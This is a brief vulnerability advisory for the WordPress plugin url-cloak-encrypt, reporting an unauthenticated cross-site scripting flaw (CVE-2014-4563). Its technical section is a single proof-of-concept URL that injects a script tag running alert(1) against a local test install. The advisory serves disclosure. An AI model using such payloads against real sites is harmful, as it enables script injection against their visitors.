Wp Plugin Url Cloak Encrypt

Plugin Details

Plugin Name: wp-plugin : url-cloak-encrypt
Effected Version : 2 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4563
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

http://127.0.0.1/wordpress/wp-content/urlcloakencrypt/go.php?url=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E